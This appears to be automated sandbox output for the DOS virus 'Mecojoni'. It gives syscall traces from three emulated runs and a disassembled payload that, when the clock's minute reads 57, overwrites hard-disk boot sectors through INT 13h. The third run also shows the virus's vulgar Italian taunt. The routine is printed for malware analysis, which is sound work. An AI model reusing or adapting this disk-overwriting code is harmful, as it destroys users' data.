Sample viewer

vx.netlux.org/Virus.DOS.FaxFree.Mecojoni.g


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:53:45.403080994Z 74 PC: 12d1b | Reallocate memory
2018-12-17T22:53:45.405661674Z 72 PC: 12d22 | Allocate memory
2018-12-17T22:53:45.407608566Z 44 PC: 13461 | Get time
0x13461: cmp cl, 0x39
0x13464: jne 0x13499
0x13466: mov dl, 0x80
0x13468: mov dh, 0
0x1346a: mov ch, 0
0x1346c: mov cl, 1
0x1346e: mov al, 9
0x13470: mov ah, 3
0x13472: int 0x13
0x13474: mov dl, 0x80
0x13476: mov dh, 1
0x13478: mov ch, 0
0x1347a: mov cl, 1
0x1347c: mov al, 9
0x1347e: mov ah, 3
0x13480: int 0x13
0x13482: mov dx, 0x34a
0x13485: mov ah, 9
0x13487: int 0x21
0x13489: mov dx, 0x39b
2018-12-17T22:53:45.410544215Z 72 PC: 13262 | Allocate memory
2018-12-17T22:53:45.412965699Z 75 PC: 1329d | Execute program
2018-12-17T22:53:45.437386521Z 76 PC: 13934 | Terminate with return code (Return code = '0')
2018-12-17T22:53:45.440694834Z 53 PC: 132b1 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:53:45.442850379Z 37 PC: 132c8 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:53:45.444850743Z 77 PC: 132cc | Get program return code
2018-12-17T22:53:45.446640249Z 49 PC: 132d3 | Terminate and stay resident (Return code = '0' | Memory size = '96')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":11329,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:21.624978559Z 74 PC: 12d1b | Reallocate memory
2018-12-25T12:30:21.627316698Z 72 PC: 12d22 | Allocate memory
2018-12-25T12:30:21.629242632Z 44 PC: 13461 | Get time
0x13461: cmp cl, 0x39
0x13464: jne 0x13499
0x13466: mov dl, 0x80
0x13468: mov dh, 0
0x1346a: mov ch, 0
0x1346c: mov cl, 1
0x1346e: mov al, 9
0x13470: mov ah, 3
0x13472: int 0x13
0x13474: mov dl, 0x80
0x13476: mov dh, 1
0x13478: mov ch, 0
0x1347a: mov cl, 1
0x1347c: mov al, 9
0x1347e: mov ah, 3
0x13480: int 0x13
0x13482: mov dx, 0x34a
0x13485: mov ah, 9
0x13487: int 0x21
0x13489: mov dx, 0x39b
2018-12-25T12:30:21.631588846Z 72 PC: 13262 | Allocate memory
2018-12-25T12:30:21.633828905Z 75 PC: 1329d | Execute program
2018-12-25T12:30:21.650479203Z 76 PC: 13934 | Terminate with return code (Return code = '0')
2018-12-25T12:30:21.653833264Z 53 PC: 132b1 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:30:21.655434564Z 37 PC: 132c8 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:30:21.656943274Z 77 PC: 132cc | Get program return code
2018-12-25T12:30:21.658488372Z 49 PC: 132d3 | Terminate and stay resident (Return code = '0' | Memory size = '96')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":57,"Second":0,"TimeBased":true,"OriginalID":11329,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:22.250589812Z 74 PC: 12d1b | Reallocate memory
2018-12-25T12:30:22.253643879Z 72 PC: 12d22 | Allocate memory
2018-12-25T12:30:22.254917529Z 44 PC: 13461 | Get time
0x13461: cmp cl, 0x39
0x13464: jne 0x13499
0x13466: mov dl, 0x80
0x13468: mov dh, 0
0x1346a: mov ch, 0
0x1346c: mov cl, 1
0x1346e: mov al, 9
0x13470: mov ah, 3
0x13472: int 0x13
0x13474: mov dl, 0x80
0x13476: mov dh, 1
0x13478: mov ch, 0
0x1347a: mov cl, 1
0x1347c: mov al, 9
0x1347e: mov ah, 3
0x13480: int 0x13
0x13482: mov dx, 0x34a
0x13485: mov ah, 9
0x13487: int 0x21
0x13489: mov dx, 0x39b
2018-12-25T12:30:22.927920582Z 9 PC: 13489 | Display string (String= 'Ti sentivi sicuro. Avevi lo SCAN !!! Invece lo hai preso nel culo. Infatti il')
2018-12-25T12:30:22.933982385Z 9 PC: 13490 | Display string (String= 'virus MECOJONI ti ha formattato l Hard disk. MECOJONI è un virus self-modifying!')
2018-12-25T12:30:22.941667646Z 9 PC: 13497 | Display string (String= 'Ricordati che la tua presunzione di conoscere i virus è una follia. Arrivederci.')